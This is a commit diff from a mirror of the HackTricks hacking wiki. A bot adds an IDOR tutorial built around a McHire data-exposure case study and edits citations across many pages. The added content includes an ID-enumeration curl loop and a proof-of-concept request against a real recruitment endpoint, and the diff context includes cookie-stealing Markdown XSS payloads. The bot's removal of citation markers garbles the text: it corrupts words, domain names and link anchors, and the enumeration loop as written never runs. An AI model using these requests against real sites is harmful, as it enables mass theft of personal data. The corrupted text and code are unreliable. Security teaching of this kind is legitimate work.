maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Add content from: McHire Chatbot Platform: Default Credentials and IDOR Expose...

Browse Source
This commit is contained in:
HackTricks News Bot 2025-07-10 12:00:47 +00:00
parent 825a96d1fa
commit 6e4b16dfac
14 changed files with 138 additions and 68 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

3
src/generic-methodologies-and-resources/basic-forensic-methodology/partitions-file-systems-carving/README.md
View File

@ -97,7 +97,7 @@ The partition table header defines the usable blocks on the disk. It also define
| Offset | Length | Contents |
| --------- | -------- | ---------------------------------------------------------------------------------------------------------------------------------------------------------------------------- |
| 0 (0x00) | 8 bytes | Signature ("EFI PART", 45h 46h 49h 20h 50h 41h 52h 54h or 0x5452415020494645ULL[ ](https://en.wikipedia.org/wiki/GUID_Partition_Table#cite_note-8)on little-endian machines) |
| 0 (0x00) | 8 bytes | Signature ("EFI PART", 45h 46h 49h 20h 50h 41h 52h 54h or 0x5452415020494645ULL[ ](https://en.wikipedia.org/wiki/GUID_Partition_Table#_note-8)on little-endian machines) |
| 8 (0x08) | 4 bytes | Revision 1.0 (00h 00h 01h 00h) for UEFI 2.8 |
| 12 (0x0C) | 4 bytes | Header size in little endian (in bytes, usually 5Ch 00h 00h 00h or 92 bytes) |
| 16 (0x10) | 4 bytes | [CRC32](https://en.wikipedia.org/wiki/CRC32) of header (offset +0 up to header size) in little endian, with this field zeroed during calculation |
@ -236,4 +236,3 @@ You may notice that even performing that action there might be **other parts whe
{{#include ../../../banners/hacktricks-training.md}}

3
src/generic-methodologies-and-resources/pentesting-wifi/README.md
View File

@ -718,7 +718,7 @@ This method allows an **attacker to create a malicious access point (AP) that re
### MANA
Then, **devices started to ignore unsolicited network responses**, reducing the effectiveness of the original karma attack. However, a new method, known as the **MANA attack**, was introduced by Ian de Villiers and Dominic White. This method involves the rogue AP **capturing the Preferred Network Lists (PNL) from devices by responding to their broadcast probe requests** with network names (SSIDs) previously solicited by the devices. This sophisticated attack bypasses the protections against the original karma attack by exploiting the way devices remember and prioritize known networks.
Then, **devices started to ignore unsolid network responses**, reducing the effectiveness of the original karma attack. However, a new method, known as the **MANA attack**, was introduced by Ian de Villiers and Dominic White. This method involves the rogue AP **capturing the Preferred Network Lists (PNL) from devices by responding to their broadcast probe requests** with network names (SSIDs) previously solid by the devices. This sophisticated attack bypasses the protections against the original karma attack by exploiting the way devices remember and prioritize known networks.
The MANA attack operates by monitoring both directed and broadcast probe requests from devices. For directed requests, it records the device's MAC address and the requested network name, adding this information to a list. When a broadcast request is received, the AP responds with information matching any of the networks on the device's list, enticing the device to connect to the rogue AP.
@ -791,4 +791,3 @@ TODO: Take a look to [https://github.com/wifiphisher/wifiphisher](https://github
{{#include ../../banners/hacktricks-training.md}}

7
src/linux-hardening/privilege-escalation/splunk-lpe-and-persistence.md
View File

@ -41,9 +41,9 @@ for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8
**Usable public exploits:**
- https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2
- https://www.exploit-db.com/exploits/46238
- https://www.exploit-db.com/exploits/46487
- [https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2](https://github.com/cnotin/SplunkWhisperer2/tree/master/PySplunkWhisperer2)
- [https://www.exploit-db.com/exploits/46238](https://www.exploit-db.com/exploits/46238)
- [https://www.exploit-db.com/exploits/46487](https://www.exploit-db.com/exploits/46487)
## Abusing Splunk Queries
@ -52,4 +52,3 @@ for i in `cat ip.txt`; do python PySplunkWhisperer2_remote.py --host $i --port 8
{{#include ../../banners/hacktricks-training.md}}

5
src/mobile-pentesting/ios-pentesting/README.md
View File

@ -34,8 +34,8 @@ basic-ios-testing-operations.md
Some interesting iOS - IPA files decompilers:
- https://github.com/LaurieWired/Malimite
- https://ghidra-sre.org/
- [https://github.com/LaurieWired/Malimite](https://github.com/LaurieWired/Malimite)
- [https://ghidra-sre.org/](https://ghidra-sre.org/)
It's recommended to use the tool [**MobSF**](https://github.com/MobSF/Mobile-Security-Framework-MobSF) to perform an automatic Static Analysis to the IPA file.
@ -1180,4 +1180,3 @@ otool -L <application_path>
{{#include ../../banners/hacktricks-training.md}}

3
src/network-services-pentesting/873-pentesting-rsync.md
View File

@ -6,7 +6,7 @@
From [wikipedia](https://en.wikipedia.org/wiki/Rsync):
> **rsync** is a utility for efficiently [transferring](https://en.wikipedia.org/wiki/File_transfer) and [synchronizing](https://en.wikipedia.org/wiki/File_synchronization) [files](https://en.wikipedia.org/wiki/Computer_file) between a computer and an external hard drive and across [networked](https://en.wikipedia.org/wiki/Computer_network) [computers](https://en.wikipedia.org/wiki/Computer) by comparing the [modification times](<https://en.wikipedia.org/wiki/Timestamping_(computing)>)and sizes of files.[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite_note-man_page-3) It is commonly found on [Unix-like](https://en.wikipedia.org/wiki/Unix-like) [operating systems](https://en.wikipedia.org/wiki/Operating_system). The rsync algorithm is a type of [delta encoding](https://en.wikipedia.org/wiki/Delta_encoding), and is used for minimizing network usage. [Zlib](https://en.wikipedia.org/wiki/Zlib) may be used for additional [data compression](https://en.wikipedia.org/wiki/Data_compression),[\[3\]](https://en.wikipedia.org/wiki/Rsync#cite_note-man_page-3) and [SSH](https://en.wikipedia.org/wiki/Secure_Shell) or [stunnel](https://en.wikipedia.org/wiki/Stunnel) can be used for security.
> **rsync** is a utility for efficiently [transferring](https://en.wikipedia.org/wiki/File_transfer) and [synchronizing](https://en.wikipedia.org/wiki/File_synchronization) [files](https://en.wikipedia.org/wiki/Computer_file) between a computer and an external hard drive and across [networked](https://en.wikipedia.org/wiki/Computer_network) [computers](https://en.wikipedia.org/wiki/Computer) by comparing the [modification times](<https://en.wikipedia.org/wiki/Timestamping_(computing)>)and sizes of files.[\[3\]](https://en.wikipedia.org/wiki/Rsync#_note-man_page-3) It is commonly found on [Unix-like](https://en.wikipedia.org/wiki/Unix-like) [operating systems](https://en.wikipedia.org/wiki/Operating_system). The rsync algorithm is a type of [delta encoding](https://en.wikipedia.org/wiki/Delta_encoding), and is used for minimizing network usage. [Zlib](https://en.wikipedia.org/wiki/Zlib) may be used for additional [data compression](https://en.wikipedia.org/wiki/Data_compression),[\[3\]](https://en.wikipedia.org/wiki/Rsync#_note-man_page-3) and [SSH](https://en.wikipedia.org/wiki/Secure_Shell) or [stunnel](https://en.wikipedia.org/wiki/Stunnel) can be used for security.
**Default port:** 873
@ -101,4 +101,3 @@ Within this file, a _secrets file_ parameter might point to a file containing **
{{#include ../banners/hacktricks-training.md}}

3
src/network-services-pentesting/pentesting-jdwp-java-debug-wire-protocol.md
View File

@ -59,7 +59,7 @@ I found that the use of `--break-on 'java.lang.String.indexOf'` makes the exploi
- [http://www.shodanhq.com/search?q=JDWP-HANDSHAKE](http://www.shodanhq.com/search?q=JDWP-HANDSHAKE)
- http://www.hsc-news.com/archives/2013/000109.html (no longer active)
- [http://packetstormsecurity.com/files/download/122525/JDWP-exploitation.txt](http://packetstormsecurity.com/files/download/122525/JDWP-exploitation.txt)
- https://github.com/search?q=-Xdebug+-Xrunjdwp\&type=Code\&ref=searchresults
- [https://github.com/search?q=-Xdebug+-Xrunjdwp\&type=Code\&ref=searchresults](https://github.com/search?q=-Xdebug+-Xrunjdwp\&type=Code\&ref=searchresults)
- [http://docs.oracle.com/javase/6/docs/api/java/lang/Runtime.html](http://docs.oracle.com/javase/6/docs/api/java/lang/Runtime.html)
- [http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp-spec.html](http://docs.oracle.com)
- [http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html](http://docs.oracle.com/javase/1.5.0/docs/guide/jpda/jdwp/jdwp-protocol.html)
@ -69,4 +69,3 @@ I found that the use of `--break-on 'java.lang.String.indexOf'` makes the exploi
{{#include ../banners/hacktricks-training.md}}

38
src/network-services-pentesting/pentesting-ntp.md
View File

@ -90,12 +90,12 @@ Pay special attention to ``restrict`` lines, ``kod`` (Kiss-o'-Death) settings, `
| Year | CVE | Component | Impact |
|------|-----|-----------|--------|
| 2023 | **CVE-2023-26551→26555** | ntp 4.2.8p15 (libntp *mstolfp*, *praecis_parse*) | Multiple out-of-bounds writes reachable via **ntpq** responses. Patch in **4.2.8p16** 🡒 upgrade or back-port fixes. citeturn1search1turn1search2turn1search0|
| 2023 | **CVE-2023-33192** | **ntpd-rs** (Rust implementation) | Malformed **NTS** cookie causes remote **DoS** prior to v0.3.3 affects port 123 even when NTS **disabled**. citeturn4view0|
| 2024 | distro updates | **chrony 4.4 / 4.5** several security hardening & NTS-KE fixes (e.g. SUSE-RU-2024:2022) citeturn2search2|
| 2024 | Record DDoS | Cloudflare reports a **5.6 Tbps UDP reflection** attack (NTP among protocols used). Keep *monitor* & *monlist* disabled on Internet-facing hosts. citeturn5search0|
| 2023 | **CVE-2023-26551→26555** | ntp 4.2.8p15 (libntp *mstolfp*, *praecis_parse*) | Multiple out-of-bounds writes reachable via **ntpq** responses. Patch in **4.2.8p16** 🡒 upgrade or back-port fixes. |
| 2023 | **CVE-2023-33192** | **ntpd-rs** (Rust implementation) | Malformed **NTS** cookie causes remote **DoS** prior to v0.3.3 affects port 123 even when NTS **disabled**. |
| 2024 | distro updates | **chrony 4.4 / 4.5** several security hardening & NTS-KE fixes (e.g. SUSE-RU-2024:2022) |
| 2024 | Record DDoS | Cloudflare reports a **5.6 Tbps UDP reflection** attack (NTP among protocols used). Keep *monitor* & *monlist* disabled on Internet-facing hosts. |
> **Exploit kits**: Proof-of-concept payloads for the 2023 ntpq OOB-write series are on GitHub (see Meinberg write-up) and can be weaponised for client-side phishing of sysadmins. citeturn1search4
> **Exploit kits**: Proof-of-concept payloads for the 2023 ntpq OOB-write series are on GitHub (see Meinberg write-up) and can be weaponised for client-side phishing of sysadmins.
---
## Advanced Attacks
@ -108,11 +108,11 @@ The legacy Mode-7 ``monlist`` query returns up to **600 host addresses** and is
- Rate-limit UDP/123 on the edge or enable *sessions-required* on DDoS appliances.
- Enable *BCP 38* egress filtering to block source spoofing.
See Cloudflares learning-center article for a step-by-step breakdown. citeturn5search1
See Cloudflares learning-center article for a step-by-step breakdown.
### 2. Time-Shift / Delay attacks (Khronos / Chronos research)
Even with authentication, an on-path attacker can silently **shift the client clock** by dropping/delaying packets. The IETF **Khronos (formerly Chronos) draft** proposes querying a diverse set of servers in the background and sanity-checking the result to detect a shift > 𝚡 ms. Modern chrony (4.4+) already implements a similar sanity filter (``maxdistance`` / ``maxjitter``). citeturn9search1
Even with authentication, an on-path attacker can silently **shift the client clock** by dropping/delaying packets. The IETF **Khronos (formerly Chronos) draft** proposes querying a diverse set of servers in the background and sanity-checking the result to detect a shift > 𝚡 ms. Modern chrony (4.4+) already implements a similar sanity filter (``maxdistance`` / ``maxjitter``).
### 3. NTS abuse & 4460/tcp exposure
@ -126,7 +126,7 @@ nmap -sV -p 4460 --script ssl-enum-ciphers,ssl-cert <IP>
openssl s_client -connect <IP>:4460 -alpn ntske/1 -tls1_3 -ign_eof
```
Look for self-signed or expired certificates and weak cipher-suites (non-AEAD). Reference: RFC 8915 §4. citeturn11search0
Look for self-signed or expired certificates and weak cipher-suites (non-AEAD). Reference: RFC 8915 §4.
---
## Hardening / Best-Current-Practice (BCP-233 / RFC 8633)
@ -139,7 +139,7 @@ Look for self-signed or expired certificates and weak cipher-suites (non-AEAD).
4. Consider **leap-smear** to avoid leap-second outages, but ensure *all* downstream clients use the same smear window.
5. Keep polling ≤24 h so leap-second flags are not missed.
See RFC 8633 for a comprehensive checklist. citeturn8search0turn8search1
See RFC 8633 for a comprehensive checklist.
---
## Shodan / Censys Dorks
@ -185,14 +185,14 @@ Entry_2:
---
## References
- RFC 8915 *Network Time Security for the Network Time Protocol* (port 4460) citeturn11search0
- RFC 8633 *Network Time Protocol BCP* citeturn8search0
- Cloudflare DDoS report 2024 Q4 (5.6 Tbps) citeturn5search0
- Cloudflare *NTP Amplification Attack* article citeturn5search1
- NTP 4.2.8p15 CVE series 2023-04 citeturn1search4
- NVD entries **CVE-2023-2655155**, **CVE-2023-33192** citeturn1search1turn1search2turn1search0turn4view0
- SUSE chrony security update 2024 (chrony 4.5) citeturn2search2
- Khronos/Chronos draft (time-shift mitigation) citeturn9search1
- chronyc manual/examples for remote monitoring citeturn3search0turn10search1
- zgrab2 ntp module docs citeturn7search0
- RFC 8915 *Network Time Security for the Network Time Protocol* (port 4460)
- RFC 8633 *Network Time Protocol BCP*
- Cloudflare DDoS report 2024 Q4 (5.6 Tbps)
- Cloudflare *NTP Amplification Attack* article
- NTP 4.2.8p15 CVE series 2023-04
- NVD entries **CVE-2023-2655155**, **CVE-2023-33192**
- SUSE chrony security update 2024 (chrony 4.5)
- Khronos/Chronos draft (time-shift mitigation)
- chronyc manual/examples for remote monitoring
- zgrab2 ntp module docs
{{#include /banners/hacktricks-training.md}}

85
src/pentesting-web/idor.md
View File

@ -2,9 +2,88 @@
{{#include ../banners/hacktricks-training.md}}
**Check the post: [https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489](https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489)**
IDOR (Insecure Direct Object Reference) / Broken Object Level Authorization (BOLA) appears when a web or API endpoint discloses or accepts a usercontrollable identifier that is used **directly** to access an internal object **without verifying that the caller is authorized** to access/modify that object.
Successful exploitation normally allows horizontal or vertical privilege-escalation such as reading or modifying other users data and, in the worst case, full account takeover or mass-data exfiltration.
---
## 1. Identifying Potential IDORs
1. Look for **parameters that reference an object**:
* Path: `/api/user/1234`, `/files/550e8400-e29b-41d4-a716-446655440000`
* Query: `?id=42`, `?invoice=2024-00001`
* Body / JSON: `{"user_id": 321, "order_id": 987}`
* Headers / Cookies: `X-Client-ID: 4711`
2. Prefer endpoints that **read or update** data (`GET`, `PUT`, `PATCH`, `DELETE`).
3. Note when identifiers are **sequential or predictable** if your ID is `64185742`, then `64185741` probably exists.
4. Explore hidden or alternate flows (e.g. *"Paradox team members"* link in login pages) that might expose extra APIs.
5. Use an **authenticated low-privilege session** and change only the ID **keeping the same token/cookie**. The absence of an authorization error is usually a sign of IDOR.
### Quick manual tampering (Burp Repeater)
```
PUT /api/lead/cem-xhr HTTP/1.1
Host: www.example.com
Cookie: auth=eyJhbGciOiJIUzI1NiJ9...
Content-Type: application/json
{"lead_id":64185741}
```
### Automated enumeration (Burp Intruder / curl loop)
```bash
for id in $(seq 64185742 64185700); do
curl -s -X PUT 'https://www.example.com/api/lead/cem-xhr' \
-H 'Content-Type: application/json' \
-H "Cookie: auth=$TOKEN" \
-d '{"lead_id":'"$id"'}' | jq -e '.email' && echo "Hit $id";
done
```
---
## 2. Real-World Case Study McHire Chatbot Platform (2025)
During an assessment of the Paradox.ai-powered **McHire** recruitment portal the following IDOR was discovered:
* Endpoint: `PUT /api/lead/cem-xhr`
* Authorization: user session cookie for **any** restaurant test account
* Body parameter: `{"lead_id": N}` 8-digit, **sequential** numeric identifier
By decreasing `lead_id` the tester retrieved arbitrary applicants **full PII** (name, e-mail, phone, address, shift preferences) plus a consumer **JWT** that allowed session hijacking. Enumeration of the range `1 64,185,742` exposed roughly **64 million** records.
Proof-of-Concept request:
```bash
curl -X PUT 'https://www.mchire.com/api/lead/cem-xhr' \
-H 'Content-Type: application/json' \
-d '{"lead_id":64185741}'
```
Combined with **default admin credentials** (`123456:123456`) that granted access to the test account, the vulnerability resulted in a critical, company-wide data breach.
---
## 3. Impact of IDOR / BOLA
* Horizontal escalation read/update/delete **other users** data.
* Vertical escalation low privileged user gains admin-only functionality.
* Mass-data breach if identifiers are sequential (e.g., applicant IDs, invoices).
* Account takeover by stealing tokens or resetting passwords of other users.
---
## 4. Mitigations & Best Practices
1. **Enforce object-level authorization** on every request (`user_id == session.user`).
2. Prefer **indirect, unguessable identifiers** (UUIDv4, ULID) instead of auto-increment IDs.
3. Perform authorization **server-side**, never rely on hidden form fields or UI controls.
4. Implement **RBAC / ABAC** checks in a central middleware.
5. Add **rate-limiting & logging** to detect enumeration of IDs.
6. Security test every new endpoint (unit, integration, and DAST).
---
## 5. Tooling
* **BurpSuite extensions**: Authorize, Auto Repeater, Turbo Intruder.
* **OWASP ZAP**: Auth Matrix, Forced Browse.
* **Github projects**: `bwapp-idor-scanner`, `Blindy` (bulk IDOR hunting).
{{#include ../banners/hacktricks-training.md}}
## References
* [McHire Chatbot Platform: Default Credentials and IDOR Expose 64M Applicants PII](https://ian.sh/mcdonalds)
* [OWASP Top 10 Broken Access Control](https://owasp.org/Top10/A01_2021-Broken_Access_Control/)
* [How to Find More IDORs Vickie Li](https://medium.com/@vickieli/how-to-find-more-idors-ae2db67c9489)
{{#include /banners/hacktricks-training.md}}

4
src/pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md
View File

@ -307,8 +307,8 @@ select connect_back('192.168.100.54', 1234);
_Note that you don't need to append the `.dll` extension as the create function will add it._
For more information **read the**[ **original publication here**](https://srcincite.io/blog/2020/06/26/sql-injection-double-uppercut-how-to-achieve-remote-code-execution-against-postgresql.html)**.**\
In that publication **this was the** [**code use to generate the postgres extension**](https://github.com/sourceincite/tools/blob/master/pgpwn.c) (_to learn how to compile a postgres extension read any of the previous versions_).\
For more information **read the**[ **original publication here**](https://srcin.io/blog/2020/06/26/sql-injection-double-uppercut-how-to-achieve-remote-code-execution-against-postgresql.html)**.**\
In that publication **this was the** [**code use to generate the postgres extension**](https://github.com/sourcein/tools/blob/master/pgpwn.c) (_to learn how to compile a postgres extension read any of the previous versions_).\
In the same page this **exploit to automate** this technique was given:
```python

7
src/pentesting-web/ssrf-server-side-request-forgery/cloud-ssrf.md
View File

@ -153,9 +153,9 @@ You can [**find here the docs about metadata endpoints**](https://cloud.google.c
Requires the HTTP header **`Metadata-Flavor: Google`** and you can access the metadata endpoint in with the following URLs:
- http://169.254.169.254
- http://metadata.google.internal
- http://metadata
- [http://169.254.169.254](http://169.254.169.254)
- [http://metadata.google.internal](http://metadata.google.internal)
- [http://metadata](http://metadata)
Interesting endpoints to extract information:
@ -646,4 +646,3 @@ Rancher's metadata can be accessed using:
{{#include ../../banners/hacktricks-training.md}}

7
src/pentesting-web/xss-cross-site-scripting/xss-in-markdown.md
View File

@ -95,8 +95,8 @@ Payloads example:
```html
<!--
Fuzzing examples from
- https://github.com/cujanovic/Markdown-XSS-Payloads/blob/master/Markdown-XSS-Payloads.txt
- https://makandracards.com/makandra/481451-testing-for-xss-in-markdown-fields
- [https://github.com/cujanovic/Markdown-XSS-Payloads/blob/master/Markdown-XSS-Payloads.txt](https://github.com/cujanovic/Markdown-XSS-Payloads/blob/master/Markdown-XSS-Payloads.txt)
- [https://makandracards.com/makandra/481451-testing-for-xss-in-markdown-fields](https://makandracards.com/makandra/481451-testing-for-xss-in-markdown-fields)
-->
[a](javascript:prompt(document.cookie))
@ -108,7 +108,7 @@ Fuzzing examples from
[a](data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K)
[a](javascript:alert('XSS'))
![a'"`onerror=prompt(document.cookie)](x)\
[citelol]: (javascript:prompt(document.cookie))
[lol]: (javascript:prompt(document.cookie))
[notmalicious](javascript:window.onerror=alert;throw%20document.cookie)
[test](javascript://%0d%0aprompt(1))
[test](javascript://%0d%0aprompt(1);com)
@ -171,4 +171,3 @@ _http://danlec_@.1 style=background-image:url(data:image/png;base64,iVBORw0KGgoA
{{#include ../../banners/hacktricks-training.md}}

3
src/welcome/hacktricks-values-and-faq.md
View File

@ -48,7 +48,7 @@ Yes, you can, but **don't forget to mention the specific link(s)** where the con
> [!TIP]
>
> - **How can I cite a page of HackTricks?**
> - **How can I a page of HackTricks?**
As long as the link **of** the page(s) were you took the information from appears it's enough.\
If you need a bibtex you can use something like:
@ -145,4 +145,3 @@ This license does not grant any trademark or branding rights in relation to the
{{#include ../banners/hacktricks-training.md}}

10
src/windows-hardening/active-directory-methodology/ad-certificates.md
View File

@ -130,9 +130,9 @@ certutil -v -dstemplate
| Year | ID / Name | Impact | Key Take-aways |
|------|-----------|--------|----------------|
| 2022 | **CVE-2022-26923** “Certifried” / ESC6 | *Privilege escalation* by spoofing machine account certificates during PKINIT. | Patch is included in the **May 10 2022** security updates. Auditing & strong-mapping controls were introduced via **KB5014754**; environments should now be in *Full Enforcement* mode. citeturn2search0 |
| 2023 | **CVE-2023-35350 / 35351** | *Remote code-execution* in the AD CS Web Enrollment (certsrv) and CES roles. | Public PoCs are limited, but the vulnerable IIS components are often exposed internally. Patch as of **July 2023** Patch Tuesday. citeturn3search0 |
| 2024 | **CVE-2024-49019** “EKUwu” / ESC15 | Low-privileged users with enrollment rights could override **any** EKU or SAN during CSR generation, issuing certificates usable for client-authentication or code-signing and leading to *domain compromise*. | Addressed in **April 2024** updates. Remove “Supply in the request” from templates and restrict enrollment permissions. citeturn1search3 |
| 2022 | **CVE-2022-26923** “Certifried” / ESC6 | *Privilege escalation* by spoofing machine account certificates during PKINIT. | Patch is included in the **May 10 2022** security updates. Auditing & strong-mapping controls were introduced via **KB5014754**; environments should now be in *Full Enforcement* mode. |
| 2023 | **CVE-2023-35350 / 35351** | *Remote code-execution* in the AD CS Web Enrollment (certsrv) and CES roles. | Public PoCs are limited, but the vulnerable IIS components are often exposed internally. Patch as of **July 2023** Patch Tuesday. |
| 2024 | **CVE-2024-49019** “EKUwu” / ESC15 | Low-privileged users with enrollment rights could override **any** EKU or SAN during CSR generation, issuing certificates usable for client-authentication or code-signing and leading to *domain compromise*. | Addressed in **April 2024** updates. Remove “Supply in the request” from templates and restrict enrollment permissions. |
### Microsoft hardening timeline (KB5014754)
@ -140,13 +140,13 @@ Microsoft introduced a three-phase rollout (Compatibility → Audit → Enforcem
1. Patch all DCs & AD CS servers (May 2022 or later).
2. Monitor Event ID 39/41 for weak mappings during the *Audit* phase.
3. Re-issue client-auth certificates with the new **SID extension** or configure strong manual mappings before February 2025. citeturn2search0
3. Re-issue client-auth certificates with the new **SID extension** or configure strong manual mappings before February 2025.
---
## Detection & Hardening Enhancements
* **Defender for Identity AD CS sensor (2023-2024)** now surfaces posture assessments for ESC1-ESC8/ESC11 and generates real-time alerts such as *“Domain-controller certificate issuance for a non-DC”* (ESC8) and *“Prevent Certificate Enrollment with arbitrary Application Policies”* (ESC15). Ensure sensors are deployed to all AD CS servers to benefit from these detections. citeturn5search0
* **Defender for Identity AD CS sensor (2023-2024)** now surfaces posture assessments for ESC1-ESC8/ESC11 and generates real-time alerts such as *“Domain-controller certificate issuance for a non-DC”* (ESC8) and *“Prevent Certificate Enrollment with arbitrary Application Policies”* (ESC15). Ensure sensors are deployed to all AD CS servers to benefit from these detections.
* Disable or tightly scope the **“Supply in the request”** option on all templates; prefer explicitly defined SAN/EKU values.
* Remove **Any Purpose** or **No EKU** from templates unless absolutely required (addresses ESC2 scenarios).
* Require **manager approval** or dedicated Enrollment Agent workflows for sensitive templates (e.g., WebServer / CodeSigning).

28
src/windows-hardening/windows-local-privilege-escalation/dpapi-extracting-passwords.md
View File

@ -267,7 +267,7 @@ SharpDPAPI.exe blob /target:C:\path\to\encrypted\file /unprotect
Some applications pass an additional **entropy** value to `CryptProtectData`. Without this value the blob cannot be decrypted, even if the correct masterkey is known. Obtaining the entropy is therefore essential when targeting credentials protected in this way (e.g. Microsoft Outlook, some VPN clients).
[**EntropyCapture**](https://github.com/SpecterOps/EntropyCapture) (2022) is a user-mode DLL that hooks the DPAPI functions inside the target process and transparently records any optional entropy that is supplied. Running EntropyCapture in **DLL-injection** mode against processes like `outlook.exe` or `vpnclient.exe` will output a file mapping each entropy buffer to the calling process and blob. The captured entropy can later be supplied to **SharpDPAPI** (`/entropy:`) or **Mimikatz** (`/entropy:<file>`) in order to decrypt the data. citeturn5search0
[**EntropyCapture**](https://github.com/SpecterOps/EntropyCapture) (2022) is a user-mode DLL that hooks the DPAPI functions inside the target process and transparently records any optional entropy that is supplied. Running EntropyCapture in **DLL-injection** mode against processes like `outlook.exe` or `vpnclient.exe` will output a file mapping each entropy buffer to the calling process and blob. The captured entropy can later be supplied to **SharpDPAPI** (`/entropy:`) or **Mimikatz** (`/entropy:<file>`) in order to decrypt the data.
```powershell
# Inject EntropyCapture into the current user's Outlook
@ -280,7 +280,7 @@ SharpDPAPI.exe blob /target:secret.cred /entropy:entropy.bin /ntlm:<hash>
### Cracking masterkeys offline (Hashcat & DPAPISnoop)
Microsoft introduced a **context 3** masterkey format starting with Windows 10 v1607 (2016). `hashcat` v6.2.6 (December 2023) added hash-modes **22100** (DPAPI masterkey v1 context ), **22101** (context 1) and **22102** (context 3) allowing GPU-accelerated cracking of user passwords directly from the masterkey file. Attackers can therefore perform word-list or brute-force attacks without interacting with the target system. citeturn8search1
Microsoft introduced a **context 3** masterkey format starting with Windows 10 v1607 (2016). `hashcat` v6.2.6 (December 2023) added hash-modes **22100** (DPAPI masterkey v1 context ), **22101** (context 1) and **22102** (context 3) allowing GPU-accelerated cracking of user passwords directly from the masterkey file. Attackers can therefore perform word-list or brute-force attacks without interacting with the target system.
`DPAPISnoop` (2024) automates the process:
@ -319,11 +319,11 @@ With extracted from LDAP computers list you can find every sub network even if y
* Parallel collection of blobs from hundreds of hosts
* Parsing of **context 3** masterkeys and automatic Hashcat cracking integration
* Support for Chrome "App-Bound" encrypted cookies (see next section)
* A new **`--snapshot`** mode to repeatedly poll endpoints and diff newly-created blobs citeturn1search2
* A new **`--snapshot`** mode to repeatedly poll endpoints and diff newly-created blobs
### DPAPISnoop
[**DPAPISnoop**](https://github.com/Leftp/DPAPISnoop) is a C# parser for masterkey/credential/vault files that can output Hashcat/JtR formats and optionally invoke cracking automatically. It fully supports machine and user masterkey formats up to Windows 11 24H1. citeturn2search0
[**DPAPISnoop**](https://github.com/Leftp/DPAPISnoop) is a C# parser for masterkey/credential/vault files that can output Hashcat/JtR formats and optionally invoke cracking automatically. It fully supports machine and user masterkey formats up to Windows 11 24H1.
## Common detections
@ -337,19 +337,19 @@ With extracted from LDAP computers list you can find every sub network even if y
---
### 2023-2025 vulnerabilities & ecosystem changes
* **CVE-2023-36004 Windows DPAPI Secure Channel Spoofing** (November 2023). An attacker with network access could trick a domain member into retrieving a malicious DPAPI backup key, allowing decryption of user masterkeys. Patched in November 2023 cumulative update administrators should ensure DCs and workstations are fully patched. citeturn4search0
* **Chrome 127 “App-Bound” cookie encryption** (July 2024) replaced the legacy DPAPI-only protection with an additional key stored under the users **Credential Manager**. Offline decryption of cookies now requires both the DPAPI masterkey and the **GCM-wrapped app-bound key**. SharpChrome v2.3 and DonPAPI 2.x are able to recover the extra key when running with user context. citeturn0search0
* **CVE-2023-36004 Windows DPAPI Secure Channel Spoofing** (November 2023). An attacker with network access could trick a domain member into retrieving a malicious DPAPI backup key, allowing decryption of user masterkeys. Patched in November 2023 cumulative update administrators should ensure DCs and workstations are fully patched.
* **Chrome 127 “App-Bound” cookie encryption** (July 2024) replaced the legacy DPAPI-only protection with an additional key stored under the users **Credential Manager**. Offline decryption of cookies now requires both the DPAPI masterkey and the **GCM-wrapped app-bound key**. SharpChrome v2.3 and DonPAPI 2.x are able to recover the extra key when running with user context.
## References
- https://www.passcape.com/index.php?section=docsys&cmd=details&id=28#13
- https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++#using-dpapis-to-encrypt-decrypt-data-in-c
- https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36004
- https://security.googleblog.com/2024/07/improving-security-of-chrome-cookies-on.html
- https://specterops.io/blog/2022/05/18/entropycapture-simple-extraction-of-dpapi-optional-entropy/
- https://github.com/Hashcat/Hashcat/releases/tag/v6.2.6
- https://github.com/Leftp/DPAPISnoop
- https://pypi.org/project/donpapi/2.0.0/
- [https://www.passcape.com/index.php?section=docsys&cmd=details&id=28#13](https://www.passcape.com/index.php?section=docsys&cmd=details&id=28#13)
- [https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++#using-dpapis-to-encrypt-decrypt-data-in-c](https://www.ired.team/offensive-security/credential-access-and-credential-dumping/reading-dpapi-encrypted-secrets-with-mimikatz-and-c++#using-dpapis-to-encrypt-decrypt-data-in-c)
- [https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36004](https://msrc.microsoft.com/update-guide/vulnerability/CVE-2023-36004)
- [https://security.googleblog.com/2024/07/improving-security-of-chrome-cookies-on.html](https://security.googleblog.com/2024/07/improving-security-of-chrome-cookies-on.html)
- [https://specterops.io/blog/2022/05/18/entropycapture-simple-extraction-of-dpapi-optional-entropy/](https://specterops.io/blog/2022/05/18/entropycapture-simple-extraction-of-dpapi-optional-entropy/)
- [https://github.com/Hashcat/Hashcat/releases/tag/v6.2.6](https://github.com/Hashcat/Hashcat/releases/tag/v6.2.6)
- [https://github.com/Leftp/DPAPISnoop](https://github.com/Leftp/DPAPISnoop)
- [https://pypi.org/project/donpapi/2.0.0/](https://pypi.org/project/donpapi/2.0.0/)
{{#include ../../banners/hacktricks-training.md}}